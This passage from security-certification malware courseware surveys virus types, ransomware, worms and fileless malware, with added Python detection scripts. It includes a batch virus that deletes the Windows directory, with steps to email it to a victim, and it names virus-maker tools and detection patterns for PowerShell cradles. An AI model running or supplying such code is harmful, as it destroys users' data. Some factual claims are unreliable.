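def scan_report(blob: bytes) -> dict:
    """Run all three checks on one image and report which of them fire."""
    return {
        "body_signature": body_signature_scan(blob),
        "decryptor_signature": decryptor_signature_scan(blob),
        "emulation": emulate_and_scan(blob),
    }


if __name__ == "__main__":
    for key in (0x21, 0x5A, 0xA7):
        image = build_infected_image(key)
        print(f"key=0x{key:02x} ciphertext={image[7:15].hex()}... -> {scan_report(image)}")
```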
Sparse Infector Viruses
To spread infection, viruses typically attempt to hide from antivirus programs. Sparse infector viruses infect less often and try to minimize their probability of discovery. These viruses infect only occasionally upon satisfying certain conditions or infect only those files whose lengths fall within a narrow range.
The sparse infector virus works with two approaches:
- Replicates only occasionally (e.g., every tenth program executed or on a particular day of the week)
- Infects only those files whose lengths fall within a narrow range
The diagram below shows the working of a sparse infector virus. The attacker sends a sparse infector virus to the target machine and sets a wakeup call for the virus to execute on the 15th day of every month. This strategy makes it difficult for the antivirus program to detect the virus, thus allowing the virus to infect the target machine successfully.
Figure 7.41: Working of sparse infector virus (wake up on the 15th of every month and execute code)
Polymorphic Viruses
Such viruses infect a file with an encrypted copy of a polymorphic code already decoded by a decryption module. Polymorphic viruses modify their code for each replication to avoid detection. They accomplish this by changing the encryption module and the instruction sequence. Polymorphic mechanisms use random number generators in their implementation.
Metamorphic Viruses
Metamorphic viruses are programmed such that they rewrite themselves completely each time they infect a new executable file. Such viruses are sophisticated and use metamorphic engines for their execution.
Metamorphic code reprograms itself. It is translated into temporary code (a new variant of the same virus but with different code) and then converted back into the original code. This technique, in which the original algorithm remains intact, is used to avoid pattern recognition by antivirus software. Metamorphic viruses are more effective than polymorphic viruses.
The transformation of virus bodies ranges from simple to complex, depending on the technique used. Some techniques used for metamorphosing viruses are as follows:
- Disassembler
- Expander
- Permutator
- Assembler
Virus bodies are transformed in the following steps:
1. Inserts dead code
2. Reshapes expressions
3. Reorders instructions
4. Modifies variable names
5. Encrypts program code
6. Modifies program control structure
- Win32/Simile
The intruder programs this virus in assembly language to target Microsoft Windows. This process is complicated and generates almost 90% of the virus code.
- Zmist
Zmist is also known as Zombie.Mistfall. It was the first virus to use the technique called "code integration." This code inserts itself into other code, regenerates the code, and rebuilds the executable.
Overwriting File or Cavity Viruses
Some programs have empty spaces in them. Cavity viruses, also known as space fillers, overwrite a part of the host file with a constant (usually nulls), without increasing the length of the file while preserving its functionality. Maintaining a constant file size when infecting allows the virus to avoid detection. Cavity viruses are rarely found due to the unavailability of hosts and code complexity.
A new design of a Windows file, called the Portable Executable (PE), improves the loading speed of programs. However, it leaves a particular gap in the file while it is being executed, which can be used by the cavity virus to insert itself. The most popular virus family in this category is the CIH virus (known as Chernobyl or Spacefiller).
Figure 7.44: Working of overwriting file or cavity virus
Companion/Camouflage Viruses
The companion virus stores itself with the same filename as the target program file. The virus infects the computer upon executing the file, and it modifies the hard disk data. Companion viruses use DOS to run COM files before the execution of EXE files. The virus installs an identical COM file and infects EXE files.
This is what happens. Suppose that a companion virus is executing on the PC and decides that it is time to infect a file. It looks around and happens to find a file called notepad.exe. It now creates a file called notepad.com, containing the virus. The virus usually plants this file in the same directory as the .exe file; however, it can also place it in any directory on the DOS path. If you type notepad and press Enter, DOS executes notepad.com instead of notepad.exe (in sequence, DOS will execute COM, then EXE, and then BAT files with the same root name, if they are all in the same directory). The virus executes, possibly infecting more files, and then loads and executes notepad.exe. The user would probably fail to notice that something is wrong. It is easy to detect a companion virus just by the presence of the extra COM file in the system.
Figure 7.45: Working of companion virus/camouflage virus (the virus infects the system with a file notepad.com and saves it alongside notepad.exe)
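The detection hint at the end of the paragraph, as an added example that is not part of the courseware: a Python check that resolves names the way DOS does along a list of path directories and reports every .com that would run in place of a .exe of the same root name. The two-directory "path", its file names and contents are constructed placeholders.

```python
import tempfile
from pathlib import Path

# Extension precedence the text describes: with the same root name in one
# directory, DOS runs the COM, then the EXE, then the BAT.
SEARCH_ORDER = (".com", ".exe", ".bat")


def resolve_like_dos(directories):
    """Return {root name: [candidate paths]} ordered as DOS would find them:
    directory by directory along the path, and COM before EXE before BAT within each."""
    candidates = {}
    for directory in directories:
        directory = Path(directory)
        if not directory.is_dir():
            continue
        files = {p.name.lower(): p for p in directory.iterdir() if p.is_file()}
        roots = {Path(name).stem for name in files if Path(name).suffix in SEARCH_ORDER}
        for root in sorted(roots):
            for ext in SEARCH_ORDER:
                path = files.get(root + ext)
                if path is not None:
                    candidates.setdefault(root, []).append(path)
    return candidates


def find_companions(directories):
    """Flag every .com that would run in place of a .exe of the same root name.

    Returns (com_that_runs, exe_that_is_shadowed) pairs. A .exe shadowing another
    .exe later on the path is not reported: that is ordinary path precedence.
    """
    findings = []
    for root, cands in resolve_like_dos(directories).items():
        winner = cands[0]
        if winner.suffix.lower() != ".com":
            continue
        for other in cands[1:]:
            if other.suffix.lower() == ".exe":
                findings.append((winner, other))
    return findings


def build_demo_path():
    """Constructed two-directory 'DOS path': a companion notepad.com planted in the
    first directory shadows notepad.exe in the second; calc.exe is duplicated benignly."""
    first = Path(tempfile.mkdtemp(prefix="path1_"))
    second = Path(tempfile.mkdtemp(prefix="path2_"))
    (first / "notepad.com").write_bytes(b"constructed companion placeholder, not code")
    (first / "calc.exe").write_bytes(b"MZ constructed placeholder")
    (second / "notepad.exe").write_bytes(b"MZ constructed placeholder")
    (second / "calc.exe").write_bytes(b"MZ constructed placeholder")
    (second / "readme.txt").write_bytes(b"not executable")
    return [first, second]


if __name__ == "__main__":
    for com, exe in find_companions(build_demo_path()):
        print(f"typing '{com.stem}' would run {com} instead of {exe}")
```

On a real host the same function can be pointed at the directories of the PATH variable in order, since a companion planted earlier on the path shadows an .exe found later.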
Shell Viruses
The shell virus code forms a shell around the target host program's code, making itself the original program with the host code as its sub-routine. Nearly all boot program viruses are shell viruses.
Figure: Working of shell virus (original program before infection; virus code wrapped around the original program after infection)
File Extension Viruses
Figure 7.47: Screenshot displaying Folder Options Window
FAT Viruses
A FAT virus is a computer virus that attacks the File Allocation Table (FAT), a system used in Microsoft products and some other types of computer systems to access the information stored on a computer. By attacking the FAT, a virus can cause severe damage to a computer. FAT viruses can work in a variety of ways. Some are designed to embed themselves into files so that when the FAT accesses the file, the virus is triggered. Others may attack the FAT directly. Many are designed to overwrite files or directories, and material on a computer can be lost permanently. If a FAT virus is sufficiently powerful, it can render a computer unusable in addition to destroying data, forcing a user to reformat the computer.
Logic Bomb Viruses
A logic bomb is a virus that is triggered by a response to an event, such as the launching of an application or when a specific date/time is reached, where it involves logic to execute the trigger. For example, cyber-criminals use spyware to covertly install a keylogger on your computer. The keylogger can capture keystrokes, such as usernames and passwords. The logic bomb is designed to wait until you visit a website that requires you to log in with your credentials, such as a banking site or social network. Consequently, the logic bomb will be triggered to execute the keylogger, capture your credentials, and send them to a remote attacker.
When a logic bomb is programmed to execute on a specific date, it is referred to as a time bomb. Time bombs are usually programmed to set off when important dates are reached, such as Christmas and Valentine's Day.
Web Scripting Viruses
A web scripting virus is a type of computer security vulnerability that breaches your web browser security through a website. This allows attackers to inject client-side scripting into the web page. It can bypass access controls and steal information from the web browser. Web scripting viruses are usually used to attack sites with large populations, such as sites for social networking, user reviews, and email. Web scripting viruses can propagate slightly faster than other viruses. A typical version of web scripting viruses is DDoS. It has the potential to send spam, damage data, and defraud users.
There are two types of web scripting viruses: non-persistent and persistent. Non-persistent viruses attack you without your knowledge. In the case of a persistent virus, your cookies are directly stolen, and the attacker can hijack your session, which allows the attacker to impersonate you and cause severe damage.
Prevention
The best ways to prevent these viruses and exploits are by safely validating untrusted HTML inputs, enforcing cookie security, disabling scripts, and using scanning services such as an antivirus program with real-time protection for your web browser. It is also beneficial to avoid unknown websites and use World of Trust to ensure that a site is safe. You would notice if you are infected with a web scripting virus if your searches are linked elsewhere and the background or homepage changes. The computer runs slowly and sluggishly, and programs may close randomly. Modern-day browsers have add-ons such as AdBlocker Plus, which allow users to prevent scripts from being loaded.
E-mail Viruses
An e-mail virus refers to computer code sent to you as an e-mail attachment, which, if activated, will result in some unexpected and usually harmful effects, such as destroying specific files on your hard disk and causing the attachment to be emailed to everyone in your address book. Email viruses perform a wide variety of activities, from creating pop-ups to crashing systems or stealing personal data. Such viruses also vary in terms of how they are presented. For example, a sender of an email virus may be unknown to a user, or a subject line may be filled with nonsense. In other cases, a hacker may cleverly disguise an email to appear as if it is from a trusted or known sender.
To avoid email virus attacks, you should never open (or double-click on) an e-mail attachment unless you know who sent it and what the attachment contains; in addition, you must install and use antivirus software to scan any attachment before you open it.
Armored Viruses
Armored viruses are viruses that are designed to confuse or trick deployed antivirus systems to prevent them from detecting the actual source of the infection. These viruses make it difficult for antivirus programs to trace the actual source of the attack. They trick antivirus programs by showing some other location even though they are actually on the system itself.
The following basic techniques are adopted by armored viruses:
- Anti-disassembly
Anti-disassembly is a technique that uses specially crafted code or data in a program to produce an incorrect program listing by disassembly analysis tools.
- Anti-debugging
Anti-debugging techniques are used to ensure that the program is not running under the debugger. This can slow down the process of reverse engineering, but it cannot be prevented.
- Anti-heuristics
Anti-heuristics are used in machine code to prevent heuristic analysis, and they rely on the program's ability to protect itself from programmer and debugger intervention.
- Anti-emulation
- Anti-goat
Anti-goat techniques use heuristic rules to detect possible goat files, such as a virus that cannot infect a file if it is too small or if it contains a large amount of do-nothing instructions. Anti-goat viruses require more time for analysis.
Add-on Viruses
Add-on viruses append their code to the host code without making any changes to the latter, or relocate the host code to insert their code at the beginning.
Figure 7.48: Working of add-on virus
Intrusive Viruses
Intrusive viruses overwrite the host code completely or partly with the viral code.
Figure 7.49: Working of intrusive virus
Direct Action or Transient Viruses
Direct action or transient viruses transfer all of the controls of the host code to where it resides in the memory. The virus selects the target program to be modified and corrupts it. The life of a transient virus is directly proportional to the life of its host. Therefore, a transient virus executes only upon the execution of its attached program and terminates upon the termination of its attached program. At the time of execution, the virus may spread to other programs. This virus is transient or direct, as it operates only for a short period and goes directly to the disk to search for programs to infect.
Terminate and Stay Resident (TSR) Viruses
A terminate and stay resident (TSR) virus remains permanently in the target machine's memory during an entire work session, even after the target host's program is executed and terminated. The TSR virus remains in memory and therefore has some control over the processes. In general, the TSR virus incorporates interrupt vectors into its code so that when an interrupt occurs, the vector directs execution to the TSR code. If the TSR virus infects the system, the user needs to reboot the system to remove the virus without a trace.
The following steps are employed by TSR viruses to infect files:
- Gets control of the system
- Assigns a portion of memory for its code
- Transfers and activates itself in the allocated portion of memory
- Hooks the execution of code flow to itself
- Starts replicating to infect files
Ransomware
Ransomware is a type of malware that restricts access to the infected computer system or critical files and documents stored on it, and then demands an online ransom payment to the malware creator(s) to remove user restrictions. Ransomware might encrypt files stored on the system's hard disk or merely lock the system and display messages meant to trick the user into paying the ransom.
Usually, ransomware spreads as a Trojan, entering a system through email attachments, hacked websites, infected programs, app downloads from untrusted sites, vulnerabilities in network services, and so on. After execution, the payload in the ransomware runs and encrypts the victim's data (files and documents), which can be decrypted only by the malware author. In some cases, user interaction is restricted using a simple payload.
In a web browser, a text file or webpage displays the ransomware demands. The displayed messages appear to be from companies or law enforcement personnel falsely claiming that the victim's system is being used for illegal purposes or contains illegal content (e.g., porn videos, pirated software), or it could be a Microsoft product activation notice falsely claiming that installed Office software is fake and requires product re-activation. These messages entice victims into paying money to undo the restrictions imposed on them. Ransomware leverages victims' fear, trust, surprise, and embarrassment to get them to pay the ransom demanded.
Ransomware Families
Some additional ransomware families are as follows:
- Cerber
- CTB-Locker
- Sodinokibi
- BitPaymer
- CryptXXX
- CryptorBit
- CryptoLocker
- CryptoDefense
- CryptoWall
- Police-themed Ransomware
Examples of Ransomware
- Dharma
Dharma is a dreadful ransomware that was first identified in 2016; since then, it has been affecting various targets across the globe with new versions. It has been regularly updated with sophisticated mechanisms in recent years. At the end of March 2019, Dharma struck a parking lot system in Canada. Previously, it also infected a Texas hospital and some other organizations. The variants of this ransomware have the following extensions: .adobe, .bip, .combo, .cezar, .ETH, .java. Its encrypted files have new extensions, such as .xxxxx and .like. This ransomware employs an AES encryption algorithm to encrypt data and then displays ransom notes. These ransom notes are named either Info.hta or FILES ENCRYPTED.txt. This ransomware is carried out through email campaigns. The ransom notes ask victims to contact the threat actors via the provided email address and pay in bitcoins for the decryption service.
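An added example (not EC-Council's code) that turns the Dharma artefacts named above into a filesystem check for incident responders: it walks a share for the listed extensions and ransom-note names and returns a verdict. Beyond what the text states, it assumes that the Dharma extension is appended after the original one (report.docx.adobe), which is what keeps an ordinary .java source file from being flagged; the sample tree and its contents are constructed.

```python
import tempfile
from pathlib import Path

# Extensions the text lists for Dharma variants and for its encrypted files.
DHARMA_EXTENSIONS = {".adobe", ".bip", ".combo", ".cezar", ".eth", ".java", ".xxxxx", ".like"}
# Ransom note names from the text, compared with spaces and case removed so that
# "Info.hta", "FILES ENCRYPTED.txt" and "FILESENCRYPTED.txt" all match.
RANSOM_NOTE_NAMES = {"info.hta", "filesencrypted.txt"}


def normalise(name: str) -> str:
    return name.replace(" ", "").lower()


def looks_dharma_encrypted(path: Path) -> bool:
    """Assumption (not stated in the text): the Dharma extension follows the original one,
    e.g. report.docx.adobe, so a plain Main.java source file is NOT flagged."""
    return path.suffix.lower() in DHARMA_EXTENSIONS and len(path.suffixes) >= 2


def scan_tree(root) -> dict:
    """Walk a directory tree and collect Dharma artefacts: ransom notes and encrypted files."""
    root = Path(root)
    findings = {"ransom_notes": [], "encrypted_files": []}
    for path in root.rglob("*"):
        if not path.is_file():
            continue
        if normalise(path.name) in RANSOM_NOTE_NAMES:
            findings["ransom_notes"].append(path)
        elif looks_dharma_encrypted(path):
            findings["encrypted_files"].append(path)
    return findings


def verdict(findings: dict, min_encrypted: int = 3) -> str:
    """'infected' if a ransom note is present, or if enough encrypted-looking files exist
    even without a note; 'suspicious' for one or two such files; otherwise 'clean'."""
    if findings["ransom_notes"] or len(findings["encrypted_files"]) >= min_encrypted:
        return "infected"
    if findings["encrypted_files"]:
        return "suspicious"
    return "clean"


def build_demo_tree(infected: bool) -> Path:
    """Constructed sample share. All contents are placeholders, not real encrypted data."""
    root = Path(tempfile.mkdtemp(prefix="share_"))
    (root / "src").mkdir()
    (root / "src" / "Main.java").write_text("class Main {}")   # benign: single suffix
    (root / "readme.txt").write_text("quarterly figures")
    if infected:
        (root / "report.docx.adobe").write_bytes(b"\x00placeholder")
        (root / "photo.jpg.bip").write_bytes(b"\x00placeholder")
        (root / "src" / "db.sql.combo").write_bytes(b"\x00placeholder")
        (root / "FILES ENCRYPTED.txt").write_text("all your files have been encrypted!")
        (root / "Info.hta").write_text("<html>placeholder note</html>")
    return root


if __name__ == "__main__":
    found = scan_tree(build_demo_tree(infected=True))
    print(verdict(found), len(found["ransom_notes"]), "notes,",
          len(found["encrypted_files"]), "encrypted-looking files")
```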
Figure 7.50: Screenshot displaying ransom demand message of Dharma ransomware ("All your files have been encrypted!")
- eChoraix
Figure 7.51: Screenshot displaying ransom demand message of eChoraix ransomware (payment status, bitcoin amount, and payment address)
- SamSam
SamSam is a notorious ransomware that infected millions of unpatched servers in 2018. It was first discovered in 2016; however, it was considered as a grave ransomware after the WannaCry attack due to its vast victim base in 2018. SamSam employs the RSA-2048 asymmetric encryption technique to encrypt the acquired local files in the infected systems. Unlike other ransomware, this ransomware does not attack victims randomly. This is a targeted ransomware, which specifically targets certain reputed companies. In spite of knowing this, large multi-national companies were unable to defend themselves from such attacks. The attack technique employed by this ransomware is also different from that employed by other ransomware. Nearly all ransomware uses spam emails to propagate and perform attacks; however, SamSam employs brute-force tactics against weak passwords of the Remote Desktop Protocol (RDP).
Figure 7.52: Screenshot displaying ransom demand message of SamSam ransomware
Some additional ransomware are as follows:
- WannaCry
- Petya-NotPetya
- GandCrab
- MegaCortex
- LockerGoga
- NamPoHyu
- Ryuk
- Cryptghost
How to Infect Systems Using a Virus: Creating a Virus
A virus can be created in two different ways: by writing a simple virus program, or by using virus maker tools.
Creating a Virus
Writing a Simple Virus Program
The following steps are involved in writing a simple virus program:
1. Create a batch file Game.bat with the following text:
    @echo off
    for %%f in (*.bat) do copy %%f + Game.bat
    del c:\Windows\*.*
2. Convert the Game.bat batch file into Game.com using the bat2com utility.
3. Send the Game.com file as an email attachment to the victim.
4. When Game.com is executed by the victim, it copies itself to all the .bat files in the current directory and deletes all the files in the Windows directory on the target machine.
Using Virus Maker Tools
Virus maker tools allow you to customize and craft your virus into a single executable file. The nature of the virus depends on the options available in the virus maker tool. Once the virus file is built and executed, it can perform the following tasks:
- Disable Windows command prompt and Windows Task Manager
- Shut down the system
- Infect all executable files
- Inject itself into the Windows registry and start up with Windows
- Perform non-malicious activity such as unusual mouse and keyboard actions
The following tools are useful for testing the security of your own antivirus software.
- DELmE's Batch Virus Maker
DELmE's Batch Virus Generator is a virus creation program with many options to infect the victim's PC, such as formatting the C: drive, deleting all the files in the hard disk drive, disabling admin privileges, cleaning the registry, changing the homepage, killing tasks, and disabling/removing the antivirus and firewall.
- JPS Virus Maker
JPS Virus Maker is a tool used to create customized viruses. It has many in-built options to create a virus. Some of the features of this tool are auto-startup, turn off Windows Defender, enable remote desktop, disable task manager, disable control panel, etc.
Figure: Screenshot of JPS Virus Maker 4.0 (virus options)
Some additional virus maker tools are as follows:
- TeraBIT Virus Maker
- Andreinick05's Batch Virus Maker
How to Infect Systems Using a Virus: Propagating and Deploying a Virus
Virus Hoaxes
Techniques such as virus hoaxes and fake antivirus software are widely used by attackers to introduce viruses into victims' systems.
Virus hoaxes can be nearly as harmful as real viruses in terms of loss of productivity and bandwidth while naive users react to them and forward them to other users. Because viruses tend to create considerable fear, they have become a common subject of hoaxes. Virus hoaxes are false alarms claiming reports of nonexistent viruses. The following are some critical features of virus hoaxes:
- These warning messages, which can be rapidly propagated, state that a particular e-mail message should not be opened, and that doing so would damage one's system.
- In some cases, these warning messages themselves contain virus attachments.
Try to crosscheck the identity of the person who has posted the warning. It is a good practice to look for technical details in any message concerning viruses. Furthermore, search for information on the Internet to learn more about hoaxes, especially by scanning bulletin boards on which people actively discuss current community happenings/concerns. Before jumping to conclusions by reading Internet information, first check the following:
- If the information is posted by newsgroups that are suspicious, cross-check the information with another source.
- If the person who has posted the news is not an expert or a known person in the community, crosscheck the information with another source.
- If a government body has posted the news, the posting should also have a reference to the corresponding federal regulation.
- One of the most effective checks is to look up the suspected hoax virus by name on antivirus software vendor sites.
Google Critical Security Alert Scam:
In 2018, a massive hoax campaign was launched, in which threat actors spread Google Critical Security Alert messages to victims. Google Critical Security Alert is a service provided by Google to notify its users regarding any activity related to their accounts. The activities can include logging in, changing passwords, changing personal information, etc. Attackers create and send fake alert emails to victims, thereby notifying them that the aforementioned activities have taken place. By looking at the critical alert email, the user clicks the link provided in the email and subsequently gets infected. The figure below describes a hoax email stating "New device signed in to." By looking at this email without noting the email source, the victim clicks the "CHECK ACTIVITY" button and gets trapped.
Figure 7.55: Screenshot of Google Critical Security Alert Scam ("New device signed in to", with a "CHECK ACTIVITY" button)
Some additional virus hoaxes are as follows:
- AppleCare
- Chrome 8.5 Video
- Bangkok Earthquake video
- Critical error
- Compromising
Fake Antivirus
At present, a new fake antivirus trend has emerged. Fake antivirus tools are rapidly proliferating in the mobile application space. According to AV-Comparatives research, two-thirds of all antivirus applications present in the Android Play Store are fake.
- Free Antivirus 2019
Free Antivirus 2019 is a fake Android antivirus application. It is intended to eliminate viruses and other malware from mobile devices. However, when it is scanned by itself, it is indicated as Medium Risk, as shown in the screenshot below.
Figure 7.56: Screenshot of Antivirus Pro 2017 Fake Antivirus
Some additional fake antivirus programs are as follows:
- AntiVirus Pro 2017
- PC Secure System Antivirus
- Total AV 10
Computer Worms
Computer worms are standalone malicious programs that replicate, execute, and spread across network connections independently without human intervention. Intruders design most worms to replicate and spread across a network, thus consuming available computing resources and, in turn, causing network servers, web servers, and individual computer systems to become overloaded and stop responding. However, some worms also carry a payload to damage the host system.
Worms are a subtype of viruses. A worm does not require a host to replicate; however, in some cases, the worm's host machine is also infected. Initially, black hat professionals treated worms as a mainframe problem. Later, with the introduction of the Internet, they mainly focused on and targeted the Windows OS using the same worms by sharing them via e-mail, IRC, and other network functions.
Attackers use worm payloads to install backdoors on infected computers, which turns them into zombies and creates a botnet. Attackers use these botnets to initiate cyber-attacks.
Some of the latest computer worms are as follows:
- Monero
- Bondat
- Beapy
How is a Worm Different from a Virus?

Virus: A virus infects a system by inserting itself into a file or executable program
Worm: A worm infects a system by exploiting a vulnerability in an OS or application and replicating itself

Virus: It might delete or alter the content of files or change the location of files in the system
Worm: Typically, a worm does not modify any stored programs; it only exploits the CPU and memory

Virus: It alters the way a computer system operates without the knowledge or consent of a user
Worm: It consumes network bandwidth, system memory, etc., excessively, overloading servers and computer systems

Virus: A virus spreads at a uniform rate, as programmed
Worm: A worm spreads more rapidly than a virus

Virus: Viruses are difficult to remove from infected machines
Worm: Compared with a virus, a worm can be removed easily from a system

Table 7.4: Difference between a virus and a worm
Worm Makers

Worm makers are tools that are used to create and customize computer worms to perform malicious tasks. These worms, once created, independently spread over networks and poison entire networks. With the help of pre-defined options in the worm makers, a worm can be designed according to the task it is intended to execute.

= Internet Worm Maker Thing
Internet Worm Maker Thing is an open-source tool used to create worms that can infect a victim's drives and files, show messages, disable antivirus software, etc. This tool comes with a compiler that can easily convert your batch virus into an executable to evade antivirus software or for any other purpose.
Figure 7.57: Screenshot of Internet Worm Maker Thing

Some worm makers are as follows:
= Batch Worm Generator
= C++ Worm Generator
Module 07 Page 948
Fileless Malware Concepts
Nowadays, fileless malware is becoming a popular method of attack by cyber-criminals because of the inconspicuous characteristics of such malware as well as its ability to evade common security controls. As fileless malware can easily evade various security controls, organizations need to focus on monitoring, detecting, and preventing malicious activities instead of using traditional approaches such as scanning for malware through file signatures. This section discusses various concepts related to fileless malware.
What is Fileless Malware?

Fileless malware, also known as non-malware, infects legitimate software, applications, and other existing protocols to perform various malicious activities. It leverages any existing vulnerabilities to infect the system.

Reasons for using fileless malware in cyber attacks:

= Stealth: Fileless malware exploits legitimate system tools; hence, it is extremely difficult to detect, block, or prevent fileless attacks.
= LOL (Living-off-the-land): System tools exploited by fileless malware are already installed in the system by default. An attacker does not need to create and install custom tools on the target system.
= Trustworthy: The system tools used by fileless malware are the most frequently used and trusted tools; hence, security tools incorrectly assume that such tools are running for a legitimate purpose.

Fileless Techniques used by Attackers

= Phishing emails: Attackers use phishing emails embedded with malicious links or downloads, which, when clicked, inject and run malicious code in the victim's memory.
= Legitimate applications: Attackers exploit legitimate system packages installed in the system, such as Word and JavaScript, to run the malware.
= Native applications: Operating systems such as Windows include pre-installed tools such as PowerShell and Windows Management Instrumentation (WMI). Attackers exploit these tools to install and run malicious code.
= Infection through lateral movement: Once the fileless malware infects the target system, attackers use this system to move laterally in the network and infect other systems connected to the network.
= Malicious websites: Attackers create fraudulent websites that appear legitimate. When a victim visits such a website, it automatically scans the victim's system to detect vulnerabilities in plugins that can be exploited by the attackers to run malicious code in the browser's memory.
= Registry manipulation: Attackers use this technique to inject and run malicious code directly from the Windows registry through a legitimate system process. This helps attackers to bypass UAC, application whitelisting, etc., and also infect other running processes.
= Memory code injection: Attackers use this technique to inject malicious code and maintain persistence in the process memory of the running process with the aim of propagating and re-injecting it into other legitimate system processes that are critical for normal system operation. This helps in bypassing regular security controls. The various code injection techniques used by attackers include local shellcode injection, remote thread injection, process hollowing, etc.
Taxonomy of Fileless Malware Threats

Source: https://docs.microsoft.com

As shown in the figure below, fileless malware threats are divided into different categories:

Figure 7.5: Taxonomy of fileless malware threats
Fileless malware can be categorized based on their point of entry, i.e., how the malware creates an entry point into the target system. Fileless malware enters the target system through an exploit or compromised hardware or by the normal execution of applications or scripts. According to the above categorization, fileless malware threats are of three types based on how much evidence they leave on the victim's machine:

Type 1: No File Activity Performed
This type of malware never requires writing a file onto the disk. An example of such an infection is receiving malicious packets that exploit a vulnerability in a target host that automatically installs a backdoor in the kernel memory. Another example may involve malicious code embedded within the compromised device's firmware. Anti-malware solutions are not capable of checking a device's firmware. Hence, it is extremely difficult to detect and prevent such threats.

Type 2: Indirect File Activity
This type of malware achieves fileless presence on the target machine using files. For example, an attacker can inject a malicious PowerShell command into the WMI repository to configure a filter that executes periodically.

Type 3: Required Files to Operate
This type of malware requires files to operate, but it does not execute attacks from those files directly. For example, an attacker exploits a document with an embedded macro, Java/Flash file, or EXE file to inject malicious payloads into the target host and then maintains persistence without using any files.

Classification of fileless malware threats based on their point of entry:

= Exploits
= Execution and Injection
This type of malware can be file-based, macro-based, script-based, or disk-based. File-based malware exploits executables, DLLs, LNK files, etc., to inject a malicious payload into the process memory or other legitimate running processes. Using macro-based malware, attackers trick victims into clicking malicious links that execute macros automatically to inject a malicious payload into the process memory. Attackers implement script-based malware if they gain an initial footprint on the target system. The attacker injects a malicious payload by running a malicious script on the command prompt. Disk-based malware rewrites the boot record with malicious code, which, when executed, gains access and installs the malicious payload.
How does Fileless Malware Work?
Point of Entry

= Memory Exploits: Fileless malware uses a variety of techniques to inject and execute itself in the process memory of a legitimate system process. It exploits the memory and privileges of whitelisted system tools such as Windows Management Instrumentation (WMI), PowerShell, Command.exe, PsExec, etc.
= Malicious Website: Fileless threats may also arrive from exploit-hosting websites that appear to be legitimate business pages. When the user visits the page, the exploit kit starts scanning for vulnerabilities, such as any outdated Flash or Java plugins. If successful, it invokes Windows native tools such as PowerShell to download and execute the payload directly in the memory without writing any files to the disk. Fileless malware can also exploit script-based programs such as PowerShell, Macros, JavaScript, and VBScript. The initial script might be used for code injection or to connect to other malicious sites to download more binaries/scripts to deliver the actual payload.
= Phishing Email/Malicious Documents: Attackers can also embed malicious macros in the form of VBScript or JavaScript in a Microsoft Office document (Word, PowerPoint, Excel) or PDF, and further use social engineering techniques to get users to run the macros on their systems. Here, the attack initiates with a document or file but transforms into a fileless threat when the malicious script is executed from memory using whitelisted tools such as PowerShell.
Code Execution

= Code Injection: Fileless threats can use various code injection techniques such as process hollowing and reflective DLL injection, which directly load the shellcode into the memory without writing any file to disk.
= Script-based Injection: Fileless malware often comes embedded in a document as an email attachment. Once the document is opened, the malicious script runs in the memory, thus turning into a fileless operation. The script then invokes whitelisted applications, such as PowerShell, mshta.exe, JavaScript, WScript, and VBScript, to connect to one or more malicious websites to download additional scripts to deliver the actual payload. All these operations occur in memory, which makes it difficult for traditional anti-malware solutions to detect them.
Persistence

In general, fileless malware is not persistent in nature. As it is memory-based, restarting the system would remove the malicious code from memory and stop the infection. However, depending on the goal of the attacker, malicious scripts can be stored in various Windows built-in tools and utilities such as the Windows registry, WMI, and Windows Task Scheduler, and be set to run even after a system reboot.

= Windows Registry: Attackers can store the malicious scripts in the Windows AutoStart registry keys so that they are loaded and executed whenever the machine is restarted.
= Windows Management Instrumentation (WMI): Fileless malware also abuses WMI, which is commonly used for automating system administration tasks, to achieve and maintain persistence. In this case, attackers store the malicious scripts in the WMI repositories that are periodically triggered via WMI bindings.
= Windows Task Scheduler: Using a task scheduler, attackers can set malicious scripts to be automatically triggered and executed in a chosen time interval.
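The three persistence locations above (AutoStart registry keys, WMI event subscriptions, scheduled tasks) are where a defender looks first. The following script, added here as an example and not part of the EC-Council courseware, walks a constructed snapshot of such artifacts and flags the ones that invoke the living-off-the-land tools and PowerShell switches named in this module; the artifact records, key names and the base64 string are constructed, and on a real host they would be collected from the Run keys, the root\subscription WMI namespace and the task scheduler rather than embedded.

```python
"""Hunt the three fileless persistence locations described above: AutoStart
registry keys, WMI event subscriptions and scheduled tasks.

Added example, not part of the EC-Council courseware. The artifact records
below are a constructed snapshot; on a real host they would be collected
from the Run keys, the root\\subscription WMI namespace and the task
scheduler, which this script does not query."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Living-off-the-land tools named in this module.
LOL_TOOLS = ("powershell", "pwsh", "mshta", "wscript", "cscript", "regsvr32",
             "rundll32", "certutil", "wmic", "cmstp", "psexec")
TOOL_RE = re.compile(r"(?<![\w.])(" + "|".join(LOL_TOOLS) + r")(\.exe)?\b", re.I)

# PowerShell switches seen in the module's command lines, plus the download
# cradle and inline base64 decoding that fileless loaders rely on.
SUSPICIOUS_PATTERNS = [
    (r"-e(nc|ncodedcommand)?\s", "encoded PowerShell command"),
    (r"-(ep|ex|exec|executionpolicy)\s+bypass", "execution policy bypass"),
    (r"-nop(rofile)?\b", "PowerShell profile suppressed"),
    (r"-w(indowstyle)?\s+hidden", "hidden window"),
    (r"downloadstring|invoke-expression|\biex\b", "download-and-run cradle"),
    (r"frombase64string", "inline base64 decode"),
]


@dataclass
class Artifact:
    source: str    # "registry", "wmi" or "task"
    location: str  # registry value path, WMI consumer name or task path
    command: str   # command line that runs when the trigger fires


@dataclass
class Finding:
    artifact: Artifact
    reasons: List[str] = field(default_factory=list)


def analyze(artifact: Artifact) -> Optional[Finding]:
    """Return a Finding listing every reason the artifact deserves review, or None."""
    reasons = []
    tools = sorted({m.group(1).lower() for m in TOOL_RE.finditer(artifact.command)})
    if tools:
        reasons.append("invokes living-off-the-land tool(s): " + ", ".join(tools))
    for pattern, label in SUSPICIOUS_PATTERNS:
        if re.search(pattern, artifact.command, re.I):
            reasons.append(label)
    if artifact.source == "wmi":
        # A permanent event consumer is the module's Type 2 example: a script
        # stored in the WMI repository and fired by a filter binding.
        reasons.append("permanent WMI event subscription executes a command")
    return Finding(artifact, reasons) if reasons else None


def hunt(artifacts: List[Artifact]) -> List[Finding]:
    return [f for f in map(analyze, artifacts) if f is not None]


# Constructed snapshot: two benign entries and three that mirror the module's examples.
SAMPLE_ARTIFACTS = [
    Artifact("registry", r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
             r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    Artifact("registry", r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
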